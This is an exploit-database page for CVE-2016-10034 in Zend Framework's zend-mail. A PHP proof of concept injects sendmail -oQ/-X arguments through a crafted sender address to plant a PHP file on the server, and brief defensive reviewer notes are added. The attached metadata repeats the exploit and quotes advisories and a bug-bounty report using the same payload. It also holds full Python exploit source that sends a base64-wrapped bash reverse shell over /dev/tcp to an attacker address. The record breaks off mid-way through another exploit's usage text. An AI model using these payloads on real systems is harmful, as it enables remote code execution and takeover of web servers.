ID 1337DAY-ID-26598 Type zdt Reporter Dawid Golunski Modified 2016-12-31T00:00:00
Description
Exploit for php platform in category web applications
<?php
/*
Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11
zend-mail < 2.7.2
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html
Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
See the full advisory URL for the exploit details.
*/
// ---------------------------------------------------------------------------
// Reviewer notes (defensive context for reading this PoC):
//
// Root cause, per the CVE-2016-10034 text quoted on this page: setFrom() in
// the zend-mail Sendmail adapter let an address containing a backslash-escaped
// double quote reach the sendmail command line unneutralised, so the quoted
// local part of the address is split into the extra sendmail arguments listed
// above (-oQ selects the queue directory, -X selects the transfer-log file).
//
// Remediation: upgrade zend-mail to 2.4.11 (2.4.x line) or 2.7.2+ (2.5.x and
// 2.6.x have no fixed release per the CVE text on this page). Independently of
// the library version, never forward a user-supplied address as the envelope
// sender; validate the sender field at the form boundary and use a fixed,
// server-owned From/Sender address.
//
// Detection: the web-server user (www-data here) spawning sendmail with -X or
// -oQ options, and new .php files appearing in web-writable directories such
// as the cache path named above, are the observable artefacts of this
// technique.
// ---------------------------------------------------------------------------
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
// Quoted-local-part address: the '\"' inside the quotes is what causes the
// single address string to be broken into separate sendmail arguments.
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
// Decodes to the single <?php ... ?> line shown in the sample transfer log
// above; the base64 wrapping only hides it from casual inspection.
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");
// ------------------
// mail() param injection via the vulnerability in zend-mail
// Bootstrap: the script expects to sit one directory below the application
// root (hence chdir to the parent of its own directory) and to find the ZF2
// autoloader and config/application.php relative to that root. Statement
// order matters: autoloader registration before Application::init(), and
// init before any Zend\Mail class is referenced.
chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';
Zend\Loader\AutoloaderFactory::factory(array(
'Zend\Loader\StandardAutoloader' => array(
'autoregister_zf' => true
)
));
Zend\Mvc\Application::init(require 'config/application.php')->run();
// Build the message. setFrom() is the vulnerable call (the sender string is
// the injection vector); the body carries the text that ends up in the
// sendmail -X transfer log.
$message = new \Zend\Mail\Message();
$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
// NOTE(review): '[email protected]' looks like a mirror-side e-mail
// obfuscation artefact rather than the original literal; the exploit-db copy
// of this same PoC quoted further down this page uses 'support@localhost'.
// As written the recipient is not a valid address and may be rejected before
// send() is reached.
$message->addTo('[email protected]', 'Support');
$message->setSubject('Zend PoC');
// The CVE text on this page names the Sendmail adapter specifically; this PoC
// therefore forces that transport rather than whatever the application config
// would otherwise select.
$transport = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);
?>
# 0day.today [2018-01-03] #
{"sourceData": "<?php\r\n \r\n/*\r\n \r\nZend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)\r\nzend-mail < 2.4.11 \r\nzend-mail < 2.7.2 \r\n \r\nDiscovered/Coded by:\r\n \r\nDawid Golunski\r\nhttps://legalhackers.com\r\n \r\nFull Advisory URL:\r\nhttps://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html\r\n \r\nVideo PoC\r\nhttps://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html\r\n \r\n \r\nFollow the feed for updates:\r\n \r\nhttps://twitter.com/dawid_golunski\r\n \r\n \r\nA simple PoC (working on Sendmail MTA)\r\n \r\nIt will inject the following parameters to sendmail command:\r\n \r\nArg no. 0 == [/usr/sbin/sendmail]\r\nArg no. 1 == [-t]\r\nArg no. 2 == [-i]\r\nArg no. 3 == [-r]\r\nArg no. 4 == [attacker\\]\r\nArg no. 5 == [-oQ/tmp/]\r\nArg no. 6 == [-X/var/www/cache/phpcode.php]\r\nArg no. 7 == [\"@email.com]\r\n \r\n \r\n \r\nwhich will write the transfer log (-X) into /var/www/cache/phpcode.php file.\r\nNote /var/www/cache must be writable by www-data web user.\r\n \r\nThe resulting file will contain the payload passed in the body of the msg:\r\n \r\n09607 <<< Content-Type: text/html; charset=us-ascii\r\n09607 <<< \r\n09607 <<< <?php phpinfo(); ?>\r\n09607 <<< \r\n09607 <<< \r\n09607 <<< \r\n \r\n \r\nSee the full advisory URL for the exploit details.\r\n \r\n*/\r\n \r\n \r\n// Attacker's input coming from untrusted source such as $_GET , $_POST etc.\r\n// For example from a Contact form with sender field\r\n \r\n$email_from = '\"attacker\\\" -oQ/tmp/ -X/var/www/cache/phpcode.php \"@email.com';\r\n// encoded phpinfo() php code\r\n$msg_body = base64_decode(\"PD9waHAgcGhwaW5mbygpOyA/Pg==\");\r\n \r\n \r\n \r\n// ------------------\r\n \r\n// mail() param injection via the vulnerability in zend-mail\r\n \r\n \r\nchdir(dirname(__DIR__));\r\ninclude 'vendor/Zend/Loader/AutoloaderFactory.php';\r\n \r\nZend\\Loader\\AutoloaderFactory::factory(array(\r\n 
'Zend\\Loader\\StandardAutoloader' => array(\r\n 'autoregister_zf' => true\r\n )\r\n));\r\n \r\nZend\\Mvc\\Application::init(require 'config/application.php')->run();\r\n \r\n$message = new \\Zend\\Mail\\Message();\r\n \r\n$message->setBody($msg_body);\r\n$message->setFrom($email_from, 'Attacker');\r\n$message->addTo('[email\u00a0protected]', 'Support');\r\n$message->setSubject('Zend PoC');\r\n \r\n$transport = new \\Zend\\Mail\\Transport\\Sendmail();\r\n$transport->send($message);\r\n \r\n?>\n\n# 0day.today [2018-01-03] #", "history": [], "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/26598", "reporter": "Dawid Golunski", "href": "https://0day.today/exploit/description/26598", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "db11346ffaa9d2a637072926bcba2475"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "12bf450836db27aa6f937dfdec6a909d"}, {"key": "modified", "hash": "df4bde5fb0a52369c595bc4df00025b2"}, {"key": "published", "hash": "df4bde5fb0a52369c595bc4df00025b2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "3a9047e281e97b7589cd8037977208d1"}, {"key": "sourceData", "hash": "eb2de9bdf91eebe23d9271b38e94e288"}, {"key": "sourceHref", "hash": "284c5f7d6f28e625ccc0923625614296"}, {"key": "title", "hash": "cecf80a99c403747ffd61cac294da76d"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 8, "references": [], "lastseen": "2018-01-03T09:01:54", "published": "2016-12-31T00:00:00", "objectVersion": "1.3", "cvelist": ["CVE-2016-10034"], "id": "1337DAY-ID-26598", "hash": "fedc3583f308b33871b525ee40e3da7d0c3ac3496901d0b736bbdddc603c247c", "modified": "2016-12-31T00:00:00", "title": "Zend Framework / zend-mail 2.4.11 - Remote Code Execution 
Exploit", "edition": 1, "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-01-03T09:01:54"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-10034"]}, {"type": "f5", "idList": ["F5:K79502122"]}, {"type": "hackerone", "idList": ["H1:228112"]}, {"type": "exploitdb", "idList": ["EDB-ID:40979", "EDB-ID:42221", "EDB-ID:40986"]}, {"type": "gentoo", "idList": ["GLSA-201804-10"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201804-10.NASL"]}, {"type": "thn", "idList": ["THN:BD003AAB715C2448BF92B78197DE160C"]}, {"type": "myhack58", "idList": ["MYHACK58:62201782688"]}, {"type": "threatpost", "idList": ["THREATPOST:6FB38D322999A6FDD13C28B8C35B0C8F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140349"]}, {"type": "zdt", "idList": ["1337DAY-ID-28005"]}], "modified": "2018-01-03T09:01:54"}, "vulnersScore": 5.0}}
{"cve": [{"lastseen": "2019-05-29T18:15:32", "bulletinFamily": "NVD", "description": "The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \\\" (backslash double quote) in a crafted e-mail address.", "modified": "2018-10-21T10:29:00", "id": "CVE-2016-10034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10034", "published": "2016-12-30T19:59:00", "title": "CVE-2016-10034", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2017-06-08T00:16:10", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 
12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-01-20T00:51:00", "published": "2017-01-16T20:47:00", "id": "F5:K79502122", "href": "https://support.f5.com/csp/article/K79502122", "title": "Zend Framework vulnerability CVE-2016-10034", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:10", "bulletinFamily": "bugbounty", "bounty": 50.0, "description": " i found three vulnerability\nDirectory information disclose,Email address disclose, and possible Remote 
code execution in Zendmail\nduring signup your code accept username with ',\",/,@ while all of the special character must be forbidden or encoded in username\n\nDirectory Disclose:\n______________________\n 1. goto sign-up page and create a account with username with double quote like as\"\n2. signin and goto ur account and add email address, then logout \n3.goto Forgot-Password section and enter username of above ( as\" )\n4.and see full path of server has been disclose (screenshot: directory.png)\n\nEmail address Disclose\n_________________________\nif you look close to screenshot below that email address of the user also disclose\n\nZendmail rce\n________________________________\nfrom the above screenshot, ur are using zendmail for email verification\nand searching through exploit of zendmail ,i found that Zendmail is vulnerable to Remote code Execution\na security researcher Dawid Golunski discover its flaw CVE-2016-10034 in December\nwhere user can set corrupted email like '\"attacker\\\" -oQ/tmp/ -X/var/www/cache/phpcode.php \"@email.com'; cause RCE\nHis link https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html\nits possible to add such email in user account\ni also reported this flaw of email REGEX https://hackerone.com/reports/226334 but you ignored\n\ni also tried this payload but cant confirm that file has been created or not because i was testing in your website\nyou can also confirm by locally\n\nUsing the above username ( as\") break the sql query during email sending cause exception throw\n\nalso checked that if i used that username in password reset ,server response time is delayed\nit may cause Dos attack but it not possible in that case because u using Cloudflare network to prevent\n\n", "modified": "2017-06-21T01:46:18", "published": "2017-05-13T09:57:58", "id": "H1:228112", "href": "https://hackerone.com/reports/228112", "type": "hackerone", "title": "Paragon Initiative Enterprises: 
Directory Disclose,Email Disclose Zendmail vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2016-12-30T17:58:41", "bulletinFamily": "exploit", "description": "Zend Framework / zend-mail < 2.4.11 - Remote Code Execution. CVE-2016-10034. Webapps exploit for PHP platform", "modified": "2016-12-30T00:00:00", "published": "2016-12-30T00:00:00", "id": "EDB-ID:40979", "href": "https://www.exploit-db.com/exploits/40979/", "type": "exploitdb", "title": "Zend Framework / zend-mail < 2.4.11 - Remote Code Execution", "sourceData": "<?php\r\n \r\n/*\r\n \r\nZend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)\r\nzend-mail < 2.4.11 \r\nzend-mail < 2.7.2 \r\n \r\nDiscovered/Coded by:\r\n \r\nDawid Golunski\r\nhttps://legalhackers.com\r\n \r\nFull Advisory URL:\r\nhttps://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html\r\n\r\nVideo PoC\r\nhttps://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html\r\n\r\n\r\nFollow the feed for updates:\r\n\r\nhttps://twitter.com/dawid_golunski\r\n\r\n \r\nA simple PoC (working on Sendmail MTA)\r\n \r\nIt will inject the following parameters to sendmail command:\r\n \r\nArg no. 0 == [/usr/sbin/sendmail]\r\nArg no. 1 == [-t]\r\nArg no. 2 == [-i]\r\nArg no. 3 == [-r]\r\nArg no. 4 == [attacker\\]\r\nArg no. 5 == [-oQ/tmp/]\r\nArg no. 6 == [-X/var/www/cache/phpcode.php]\r\nArg no. 
7 == [\"@email.com]\r\n\r\n\r\n\r\nwhich will write the transfer log (-X) into /var/www/cache/phpcode.php file.\r\nNote /var/www/cache must be writable by www-data web user.\r\n\r\nThe resulting file will contain the payload passed in the body of the msg:\r\n \r\n09607 <<< Content-Type: text/html; charset=us-ascii\r\n09607 <<< \r\n09607 <<< <?php phpinfo(); ?>\r\n09607 <<< \r\n09607 <<< \r\n09607 <<< \r\n \r\n \r\nSee the full advisory URL for the exploit details.\r\n \r\n*/\r\n \r\n \r\n// Attacker's input coming from untrusted source such as $_GET , $_POST etc.\r\n// For example from a Contact form with sender field\r\n \r\n$email_from = '\"attacker\\\" -oQ/tmp/ -X/var/www/cache/phpcode.php \"@email.com';\r\n// encoded phpinfo() php code\r\n$msg_body = base64_decode(\"PD9waHAgcGhwaW5mbygpOyA/Pg==\");\r\n\r\n\r\n\r\n// ------------------\r\n \r\n// mail() param injection via the vulnerability in zend-mail\r\n\r\n\r\nchdir(dirname(__DIR__));\r\ninclude 'vendor/Zend/Loader/AutoloaderFactory.php';\r\n\r\nZend\\Loader\\AutoloaderFactory::factory(array(\r\n 'Zend\\Loader\\StandardAutoloader' => array(\r\n 'autoregister_zf' => true\r\n )\r\n));\r\n\r\nZend\\Mvc\\Application::init(require 'config/application.php')->run();\r\n\r\n$message = new \\Zend\\Mail\\Message();\r\n\r\n$message->setBody($msg_body);\r\n$message->setFrom($email_from, 'Attacker');\r\n$message->addTo('support@localhost', 'Support');\r\n$message->setSubject('Zend PoC');\r\n\r\n$transport = new \\Zend\\Mail\\Transport\\Sendmail();\r\n$transport->send($message);\r\n\r\n?>\r\n\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40979/"}, {"lastseen": "2017-06-22T04:15:01", "bulletinFamily": "exploit", "description": "PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution. CVE-2016-10033,CVE-2016-10034,CVE-2016-10045,CVE-2016-10074. 
Webapps exploit for PHP platform", "modified": "2017-06-21T00:00:00", "published": "2017-06-21T00:00:00", "id": "EDB-ID:42221", "href": "https://www.exploit-db.com/exploits/42221/", "type": "exploitdb", "title": "PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution", "sourceData": "#!/usr/bin/python\r\n#\r\n# Exploit Title: [RCE for PHPMailer < 5.2.20 with Exim MTA]\r\n# Date: [16/06/2017]\r\n# Exploit Author: [@phackt_ul]\r\n# Software Link: [https://github.com/PHPMailer/PHPMailer]\r\n# Version: [< 5.2.20]\r\n# Tested on: [Debian x86/x64]\r\n# CVE : [CVE-2016-10033,CVE-2016-10074,CVE-2016-10034,CVE-2016-10045]\r\n#\r\n# @phackt_ul - https://phackt.com\r\n#\r\n# All credits go to Dawid Golunski (@dawid_golunski) - https://legalhackers.com\r\n# and its research on PHP libraries vulns\r\n#\r\n# PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\r\n# PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass\r\n# SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\r\n# Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\r\n#\r\n# ExploitBox project:\r\n# https://ExploitBox.io\r\n#\r\n# Full advisory URL:\r\n# https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html\r\n# https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html\r\n# http://pwnscriptum.com/\r\n#\r\n# --------------------------------------------------------\r\n# Enhanced for Exim MTA\r\n# \r\n# N.B: \r\n# The original author's method in the PHPMailer POC (for sendmail MTA) uses the RFC 3696 \r\n# double quotes technique associated with the -oQ -X options to log mailer traffic and to create \r\n# the backdoor. 
This technique is not facing some payload size issues because the payload \r\n# was in the email body.\r\n#\r\n# For Exim:\r\n# The original author's Wordpress 4.6 POC for Exim combines the comment syntax (RFC 822)\r\n# and the Exim expansion mode techniques. The use of substr on spool_directory and tod_log \r\n# expansion variables in order to bypass the PHP mail() escaping may leads to large \r\n# email addresses payloads. However the comment syntax validateAddress() technique does not \r\n# face any size limitation but its use can not be applied for PHPMailer < 5.2.20.\r\n#\r\n# Goal:\r\n# The use of double quotes validateAdresse() technique (and it's patch bypass for PHPMailer < 5.5.20) \r\n# combined with the Exim expansion mode technique may leads to large payloads quickly facing addresses\r\n# size limit here (260 chars) and so not matching the pcre8 regexp in the validateAddress() function.\r\n# We are now base64 encoding the command in order to bypass escapeshellcmd() and allowing larger payloads.\r\n# \r\n#\r\n# Usage:\r\n# ./rce_phpmailer_exim4.py -url http://victim/phpmailer/ -cf contact_form.php -ip 192.168.1.109 -p 1337\r\n#\r\n#\r\n# Requirements:\r\n# - Vulnerable PHP libraries\r\n# - Exim MTA Agent\r\n#\r\n# \r\n# Disclaimer:\r\n# For testing purposes only on your local machine - http://pwnscriptum.com/PwnScriptum_PHPMailer_PoC_contactform.zip\r\n\r\nimport argparse\r\nimport urllib\r\nimport urllib2\r\nimport base64\r\n\r\n# Prepare command for Exim expansion mode in order \r\ndef prepare_cmd(cmd):\r\n return '${run{${base64d:%s}}}' % base64.b64encode(cmd)\r\n\r\n# Send Request method\r\ndef send_request(req):\r\n try:\r\n urllib2.urlopen(req)\r\n except urllib2.HTTPError, e:\r\n print \"[!] Got HTTP error: [%d] when trying to reach \" + req.get_full_url() + \" - Check the URL!\\n\\n\" % e.code\r\n exit(3)\r\n except urllib2.URLError, err:\r\n print \"[!] 
Got the '%s' error when trying to reach \" + req.get_full_url() + \" - Check the URL!\\n\\n\" % err.reason\r\n exit(4)\r\n\r\n# Parse input args\r\nparser = argparse.ArgumentParser(prog='rce_phpmailer_exim4.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit for Exim4 based on LegalHackers sendmail version')\r\nparser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url')\r\nparser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname')\r\nparser.add_argument('-ip', dest='ATTACKER_IP', required=True, help='Attacker IP for reverse shell')\r\nparser.add_argument('-p', dest='ATTACKER_PORT', required=False, help='Attackers Port for reverse shell', default=\"8888\")\r\nparser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST \"action\" field name', default=\"send\")\r\nparser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST \"name of sender\" field name', default=\"name\")\r\nparser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST \"email\" field name', default=\"email\")\r\nparser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST \"message\" field name', default=\"msg\")\r\nargs = parser.parse_args()\r\n\r\nCONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT\r\n\r\n# Show params\r\nprint \"\"\"[+] Setting vars to: \\n\r\nWEBAPP_BASE_URL = [%s]\r\nCONTACT_SCRIPT = [%s]\r\nATTACKER_IP = [%s]\r\nATTACKER_PORT = [%s]\r\nPOST_ACTION = [%s]\r\nPOST_NAME = [%s]\r\nPOST_EMAIL = [%s]\r\nPOST_MSG = [%s]\r\n\"\"\" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.ATTACKER_IP, args.ATTACKER_PORT, args.POST_ACTION, args.POST_NAME, args.POST_EMAIL, args.POST_MSG)\r\n\r\n# Ask for mail library\r\nprint \"[+] Choose your target / payload: \"\r\nprint \"\\033[1;34m\"\r\nprint \"\"\"[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\"\"\"\r\nprint 
\"\"\" SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\"\"\"\r\nprint \"\"\" Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\\n\"\"\"\r\nprint \"\"\"[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass\"\"\"\r\nprint \"\\033[0m\"\r\n\r\ntry:\r\n target = int(raw_input('[?] Select target [1-2]: '))\r\nexcept ValueError:\r\n print \"Not a valid choice. Exiting\\n\"\r\n exit(2)\r\n\r\nif (target>2):\r\n print \"No such target. Exiting\\n\"\r\n exit(3)\r\n\r\n################################\r\n# Payload\r\n################################\r\ncmd = \"/bin/bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.19/1337;nohup sh <&196 >&196 2>&196 &'\"\r\nprepared_cmd = prepare_cmd(cmd)\r\n\r\npayload = '\"a\\\\\" -be ' + prepared_cmd + ' \"@a.co'\r\n\r\n# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)\r\nif target == 2:\r\n payload = \"\\\"a\\\\' -be \" + prepared_cmd + \" \\\"@a.co\"\r\n\r\n################################\r\n# Attack episode\r\n# This step will execute the reverse shell\r\n################################\r\n\r\n# Form fields\r\npost_fields = {'action': \"%s\" % args.POST_ACTION, \"%s\" % args.POST_NAME: 'Jas Fasola', \"%s\" % args.POST_EMAIL: payload, \"%s\" % args.POST_MSG: 'Really important message'}\r\n\r\n# Print relevant information\r\nprint \"\\n[+] Executing command on victim server\\n\"\r\nprint '[!] command: [%s]' % cmd\r\nprint '[!] payload: [%s]' % payload\r\nprint '[!] 
post_fields: [%s]\\n' % str(post_fields)\r\n\r\ndata = urllib.urlencode(post_fields)\r\nreq = urllib2.Request(CONTACT_SCRIPT_URL, data)\r\nsend_request(req)\r\n\r\nprint \"\\033[1;32m[+] You should check your listener and cross the fingers ;)\\033[0m\\n\"\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42221/"}, {"lastseen": "2017-01-03T01:58:42", "bulletinFamily": "exploit", "description": "PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution. CVE-2016-10033,CVE-2...", "modified": "2017-01-02T00:00:00", "published": "2017-01-02T00:00:00", "id": "EDB-ID:40986", "href": "https://www.exploit-db.com/exploits/40986/", "type": "exploitdb", "title": "PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution", "sourceData": "#!/usr/bin/python\r\n\r\nintro = \"\"\"\\033[94m \r\n __ __ __ __ __ \r\n / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________\r\n / / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/\r\n / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \r\n/_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \r\n /____/ \r\n\r\n\r\nPHPMailer / Zend-mail / SwiftMailer - Remote Code Execution Exploit\r\n\t\t a.k.a \"PwnScriptum\"\r\n\r\n CVE-2016-10033 + CVE-2016-10045 + CVE-2016-10034 + CVE-2016-10074\r\n\r\n\r\nThis PoC exploit aims to execute a reverse shell on the target in \r\nthe context of the web-server user via vulnerable PHP email library.\r\n\r\n\r\nDiscovered and Coded by:\r\n\r\n\\033[1;34m \r\n Dawid Golunski\r\n https://legalhackers.com\r\n\r\n t: @dawid_golunski for updates\r\n\\033[0m\r\n\\033[94m \r\nP.$. For testing only! Don't break the Web ;) \r\n\\033[0m\r\n\"\"\"\r\ninfo = \"\"\"\r\n[Version]\r\nLimited (ver. 
1.0)\r\n\r\n[PoC Video]\r\nSee the the exploit in action at:\r\n\r\nhttps://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html\r\n\r\n[Info]\r\nThis exploit targets a common webapp component - Contact Form. \r\n\r\nIt combines payloads for the following vulns:\r\n\r\n1. PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\r\nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html\r\n\r\n2. PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045 / escapeshell bypass)\r\nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln.html\r\n\r\n3. SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\r\nhttps://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html\r\n\r\n4. Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\r\nhttps://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html\r\n\r\n[Usage]\r\n\r\n./PwnScriptum_RCE_exploit.py [-h] -url WEBAPP_BASE_URL -cf CONTACT_SCRIPT\r\n [-d TARGET_UP_DIR] -ip ATTACKERS_IP\r\n [-p ATTACKERS_PORT] [--version]\r\n [--post-action POST_ACTION]\r\n [--post-name 